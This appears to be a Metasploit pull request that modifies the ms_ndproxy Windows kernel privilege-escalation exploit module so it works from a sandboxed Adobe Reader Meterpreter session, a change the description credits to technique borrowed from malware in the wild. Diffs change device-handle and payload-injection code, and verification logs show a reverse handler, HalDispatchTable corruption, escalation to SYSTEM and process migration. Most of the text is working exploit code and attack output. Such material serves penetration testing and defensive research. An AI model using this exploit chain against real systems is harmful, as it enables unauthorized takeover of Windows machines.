### PR TITLE
Fix ms_ndproxy to work under a sandboxed Reader

### DIFF
--- a/modules/exploits/windows/local/ms_ndproxy.rb
+++ b/modules/exploits/windows/local/ms_ndproxy.rb
@@ -437,12 +437,11 @@ class Metasploit3 < Msf::Exploit::Local
 
     if new_pid.nil?
       print_warning("Unable to create a new process, maybe you're into a sandbox. If the current process has been elevated try to migrate before executing a new process...")
+      return
     end
 
     print_status("Injecting #{p.length.to_s} bytes into #{new_pid} memory and executing it...")
-    shellcode_executed = execute_shellcode(p, nil, new_pid)
-
-    if shellcode_executed
+    if execute_shellcode(p, nil, new_pid)
       print_good("Enjoy")
     else
       fail_with(Failure::Unknown, "Error while executing the payload")

--- a/modules/exploits/windows/local/ms_ndproxy.rb
+++ b/modules/exploits/windows/local/ms_ndproxy.rb
@@ -150,7 +150,7 @@ class Metasploit3 < Msf::Exploit::Local
 
     invalid_handle_value = 0xFFFFFFFF
 
-    r = session.railgun.kernel32.CreateFileA(dev, "GENERIC_READ | GENERIC_WRITE", 0x3, nil, "OPEN_EXISTING", 0, 0)
+    r = session.railgun.kernel32.CreateFileA(dev, 0x0, 0x0, nil, 0x3, 0, 0)
 
     handle = r['return']
 
@@ -234,7 +234,14 @@ class Metasploit3 < Msf::Exploit::Local
     windir = expand_path("%windir%")
     cmd = "#{windir}\\System32\\notepad.exe"
     # run hidden
-    proc = session.sys.process.execute(cmd, nil, {'Hidden' => true })
+    begin
+      proc = session.sys.process.execute(cmd, nil, {'Hidden' => true })
+    rescue Rex::Post::Meterpreter::RequestError
+      # when running from the Adobe Reader sandbox:
+      # Exploit failed: Rex::Post::Meterpreter::RequestError stdapi_sys_process_execute: Operation failed: Access is denied.
+      return nil
+    end
+
     return proc.pid
   end
 
@@ -424,16 +431,23 @@ class Metasploit3 < Msf::Exploit::Local
       fail_with(Failure::Unknown, "The exploitation wasn't successful")
     end
 
+    p = payload.encoded
     print_good("Exploitation successful! Creating a new process and launching payload...")
     new_pid = create_proc
-    p = payload.encoded
+
+    if new_pid.nil?
+      print_warning("Unable to create a new process, maybe you're into a sandbox. If the current process has been elevated try to migrate before executing a new process...")
+    end
 
     print_status("Injecting #{p.length.to_s} bytes into #{new_pid} memory and executing it...")
-    if execute_shellcode(p, nil, new_pid)
+    shellcode_executed = execute_shellcode(p, nil, new_pid)
+
+    if shellcode_executed
       print_good("Enjoy")
     else
       fail_with(Failure::Unknown, "Error while executing the payload")
     end
+
 
   end
 

--- a/modules/exploits/windows/local/ms_ndproxy.rb
+++ b/modules/exploits/windows/local/ms_ndproxy.rb
@@ -28,7 +28,7 @@ class Metasploit3 < Msf::Exploit::Local
       'License'       => MSF_LICENSE,
       'Author'        =>
         [
-          'Unkwnon', # Vulnerability discovery
+          'Unknown', # Vulnerability discovery
           'ryujin', # python PoC
           'Shahin Ramezany', # C PoC
           'juan vazquez' # MSF module


### PR DESCRIPTION
Short history, just learned from the malware in the wild how to CreateFile on a device to exploit ms_ndproxy under a sandboxed Reader.
# Verification
- [x] Get a session from a sandboxed reader, using modules/exploits/windows/fileformat/reader_toolbutton for example. You shouldn't be able to migrate neither execute new processes:

```
msf exploit(handler) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] Starting the payload handler...
[*] Sending stage (769024 bytes) to 192.168.172.244
[*] Meterpreter session 4 opened (192.168.172.1:4444 -> 192.168.172.244:1042) at 2013-12-16 16:28:00 -0600

meterpreter > execute -f c:\\windows\\system32\\calc.exe
[-] stdapi_sys_process_execute: Operation failed: Access is denied.
meterpreter > ps

Process List
============

 PID   PPID  Name              Arch  Session     User                           Path
 ---   ----  ----              ----  -------     ----                           ----
 0     0     [System Process]        4294967295                                 
 4     0     System                  4294967295                                 
 168   680   svchost.exe             4294967295                                 
 300   680   jqs.exe                 4294967295                                 
 404   680   alg.exe                 4294967295                                 
 560   4     smss.exe                4294967295                                 
 612   560   csrss.exe               4294967295                                 
 636   560   winlogon.exe            4294967295                                 
 680   636   services.exe            4294967295                                 
 692   636   lsass.exe               4294967295                                 
 804   680   vmtoolsd.exe            4294967295                                 
 848   680   vmacthlp.exe            4294967295                                 
 864   680   svchost.exe             4294967295                                 
 944   680   svchost.exe             4294967295                                 
 1036  680   svchost.exe             4294967295                                 
 1096  680   svchost.exe             4294967295                                 
 1332  680   svchost.exe             4294967295                                 
 1468  1448  explorer.exe            4294967295                                 
 1564  680   spoolsv.exe             4294967295                                 
 1780  1468  VMwareTray.exe          4294967295                                 
 1788  1468  vmtoolsd.exe            4294967295                                 
 1796  1800  jucheck.exe             4294967295                                 
 1800  1468  jusched.exe             4294967295                                 
 1812  1468  rundll32.exe            4294967295                                 
 1848  1468  ctfmon.exe              4294967295                                 
 2404  1468  cmd.exe                 4294967295                                 
 2472  1036  wscntfy.exe             4294967295                                 
 3140  1036  wuauclt.exe             4294967295                                 
 3260  1468  procexp.exe             4294967295                                 
 3320  864   wmiprvse.exe            4294967295                                 
 3488  1468  AcroRd32.exe            4294967295                                 
 3516  3488  AcroRd32.exe      x86   0           JUAN-C0DE875735\Administrator  C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe


meterpreter > migrate 2404
[*] Migrating from 3516 to 2404...
[-] Error running command migrate: Rex::RuntimeError Cannot migrate into this process (insufficient privileges)

```
- [ ] Use the old exploits/windows/local/ms_ndproxy to elevate the session, should fail when trying to open the Device
- [ ] Switch to this pull request. Use the new exploits/windows/local/ms_ndproxy to elevate the session, should work, even when it will elevate the process because the sandbox still prevents execution of new processes:

```
msf exploit(handler) > use exploit/windows/local/ms_ndproxy 
msf exploit(ms_ndproxy) > set session 4
session => 4
msf exploit(ms_ndproxy) > rexploit
[*] Reloading module...

[*] Started reverse handler on 10.6.0.165:4444 
[*] Detecting the target system...
[*] Running against Windows XP SP3
[*] Checking device...
[+] \\.\NDProxy found!
[*] Disclosing the HalDispatchTable and hal!HaliQuerySystemInfo addresses...
[+] Addresses successfully disclosed.
[*] Storing the kernel stager on memory...
[+] Kernel stager successfully stored at 0x1000
[*] Storing the trampoline to the kernel stager on memory...
[+] Trampoline successfully stored at 0x1
[*] Storing the IO Control buffer on memory...
[+] IO Control buffer successfully stored at 0xd0d0000
[*] Triggering the vulnerability, corrupting the HalDispatchTable...
[*] Executing the Kernel Stager throw NtQueryIntervalProfile()...
[*] Checking privileges after exploitation...
[+] Exploitation successful! Creating a new process and launching payload...
[!] Unable to create a new process, maybe you're into a sandbox. If the current process has been elevated try to migrate before executing a new process...
msf exploit(ms_ndproxy) > sessions -i 4
[*] Starting interaction with 4...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```
- [x] Even when the elevated session is SYSTEM, the sandbox still prevents execution of new processes. But now you should be able to migrate and execute:

```
meterpreter > ps

Process List
============

 PID   PPID  Name              Arch  Session     User                           Path
 ---   ----  ----              ----  -------     ----                           ----
 0     0     [System Process]        4294967295                                 
 4     0     System            x86   0           NT AUTHORITY\SYSTEM            
 168   680   svchost.exe       x86   0           NT AUTHORITY\LOCAL SERVICE     C:\WINDOWS\system32\svchost.exe
 300   680   jqs.exe           x86   0           NT AUTHORITY\SYSTEM            C:\Program Files\Java\jre6\bin\jqs.exe
 404   680   alg.exe           x86   0           NT AUTHORITY\LOCAL SERVICE     C:\WINDOWS\System32\alg.exe
 560   4     smss.exe          x86   0           NT AUTHORITY\SYSTEM            \SystemRoot\System32\smss.exe
 612   560   csrss.exe         x86   0           NT AUTHORITY\SYSTEM            \??\C:\WINDOWS\system32\csrss.exe
 636   560   winlogon.exe      x86   0           NT AUTHORITY\SYSTEM            \??\C:\WINDOWS\system32\winlogon.exe
 680   636   services.exe      x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\services.exe
 692   636   lsass.exe         x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\lsass.exe
 804   680   vmtoolsd.exe      x86   0           NT AUTHORITY\SYSTEM            C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 848   680   vmacthlp.exe      x86   0           NT AUTHORITY\SYSTEM            C:\Program Files\VMware\VMware Tools\vmacthlp.exe
 864   680   svchost.exe       x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\svchost.exe
 944   680   svchost.exe       x86   0           NT AUTHORITY\NETWORK SERVICE   C:\WINDOWS\system32\svchost.exe
 1036  680   svchost.exe       x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\System32\svchost.exe
 1096  680   svchost.exe       x86   0           NT AUTHORITY\NETWORK SERVICE   C:\WINDOWS\system32\svchost.exe
 1332  680   svchost.exe       x86   0           NT AUTHORITY\LOCAL SERVICE     C:\WINDOWS\system32\svchost.exe
 1468  1448  explorer.exe      x86   0           JUAN-C0DE875735\Administrator  C:\WINDOWS\Explorer.EXE
 1564  680   spoolsv.exe       x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\spoolsv.exe
 1780  1468  VMwareTray.exe    x86   0           JUAN-C0DE875735\Administrator  C:\Program Files\VMware\VMware Tools\VMwareTray.exe
 1788  1468  vmtoolsd.exe      x86   0           JUAN-C0DE875735\Administrator  C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 1796  1800  jucheck.exe       x86   0           JUAN-C0DE875735\Administrator  C:\Program Files\Common Files\Java\Java Update\jucheck.exe
 1800  1468  jusched.exe       x86   0           JUAN-C0DE875735\Administrator  C:\Program Files\Common Files\Java\Java Update\jusched.exe
 1812  1468  rundll32.exe      x86   0           JUAN-C0DE875735\Administrator  C:\WINDOWS\system32\rundll32.exe
 1848  1468  ctfmon.exe        x86   0           JUAN-C0DE875735\Administrator  C:\WINDOWS\system32\ctfmon.exe
 2404  1468  cmd.exe           x86   0           JUAN-C0DE875735\Administrator  C:\WINDOWS\system32\cmd.exe
 2472  1036  wscntfy.exe       x86   0           JUAN-C0DE875735\Administrator  C:\WINDOWS\system32\wscntfy.exe
 3140  1036  wuauclt.exe       x86   0           JUAN-C0DE875735\Administrator  C:\WINDOWS\system32\wuauclt.exe
 3260  1468  procexp.exe       x86   0           JUAN-C0DE875735\Administrator  C:\Documents and Settings\Administrator\Desktop\ProcessExplorer\procexp.exe
 3320  864   wmiprvse.exe      x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\wbem\wmiprvse.exe
 3488  1468  AcroRd32.exe      x86   0           JUAN-C0DE875735\Administrator  C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe
 3516  3488  AcroRd32.exe      x86   0           NT AUTHORITY\SYSTEM            C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe


meterpreter > execute -f c:\\windows\\system32\\calc.exe
[-] stdapi_sys_process_execute: Operation failed: Access is denied.
meterpreter > migrate 2404
[*] Migrating from 3516 to 2404...
[*] Migration completed successfully.
meterpreter > execute -f c:\\windows\\system32\\calc.exe
Process 2172 created.
meterpreter > ps

Process List
============

 PID   PPID  Name              Arch  Session     User                           Path
 ---   ----  ----              ----  -------     ----                           ----
 0     0     [System Process]        4294967295                                 
 4     0     System            x86   0                                          
 168   680   svchost.exe       x86   0                                          C:\WINDOWS\system32\svchost.exe
 300   680   jqs.exe           x86   0           NT AUTHORITY\SYSTEM            C:\Program Files\Java\jre6\bin\jqs.exe
 404   680   alg.exe           x86   0                                          C:\WINDOWS\System32\alg.exe
 560   4     smss.exe          x86   0           NT AUTHORITY\SYSTEM            \SystemRoot\System32\smss.exe
 612   560   csrss.exe         x86   0           NT AUTHORITY\SYSTEM            \??\C:\WINDOWS\system32\csrss.exe
 636   560   winlogon.exe      x86   0           NT AUTHORITY\SYSTEM            \??\C:\WINDOWS\system32\winlogon.exe
 680   636   services.exe      x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\services.exe
 692   636   lsass.exe         x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\lsass.exe
 804   680   vmtoolsd.exe      x86   0           NT AUTHORITY\SYSTEM            C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 848   680   vmacthlp.exe      x86   0           NT AUTHORITY\SYSTEM            C:\Program Files\VMware\VMware Tools\vmacthlp.exe
 864   680   svchost.exe       x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\svchost.exe
 944   680   svchost.exe       x86   0                                          C:\WINDOWS\system32\svchost.exe
 1036  680   svchost.exe       x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\System32\svchost.exe
 1096  680   svchost.exe       x86   0                                          C:\WINDOWS\system32\svchost.exe
 1332  680   svchost.exe       x86   0                                          C:\WINDOWS\system32\svchost.exe
 1468  1448  explorer.exe      x86   0           JUAN-C0DE875735\Administrator  C:\WINDOWS\Explorer.EXE
 1564  680   spoolsv.exe       x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\spoolsv.exe
 1780  1468  VMwareTray.exe    x86   0           JUAN-C0DE875735\Administrator  C:\Program Files\VMware\VMware Tools\VMwareTray.exe
 1788  1468  vmtoolsd.exe      x86   0           JUAN-C0DE875735\Administrator  C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 1796  1800  jucheck.exe       x86   0           JUAN-C0DE875735\Administrator  C:\Program Files\Common Files\Java\Java Update\jucheck.exe
 1800  1468  jusched.exe       x86   0           JUAN-C0DE875735\Administrator  C:\Program Files\Common Files\Java\Java Update\jusched.exe
 1812  1468  rundll32.exe      x86   0           JUAN-C0DE875735\Administrator  C:\WINDOWS\system32\rundll32.exe
 1848  1468  ctfmon.exe        x86   0           JUAN-C0DE875735\Administrator  C:\WINDOWS\system32\ctfmon.exe
 2172  2404  calc.exe          x86   0           JUAN-C0DE875735\Administrator  c:\windows\system32\calc.exe
 2404  1468  cmd.exe           x86   0           JUAN-C0DE875735\Administrator  C:\WINDOWS\system32\cmd.exe
 2472  1036  wscntfy.exe       x86   0           JUAN-C0DE875735\Administrator  C:\WINDOWS\system32\wscntfy.exe
 3140  1036  wuauclt.exe       x86   0           JUAN-C0DE875735\Administrator  C:\WINDOWS\system32\wuauclt.exe
 3260  1468  procexp.exe       x86   0           JUAN-C0DE875735\Administrator  C:\Documents and Settings\Administrator\Desktop\ProcessExplorer\procexp.exe
 3320  864   wmiprvse.exe      x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\wbem\wmiprvse.exe


meterpreter > exit
[*] Shutting down Meterpreter...
```
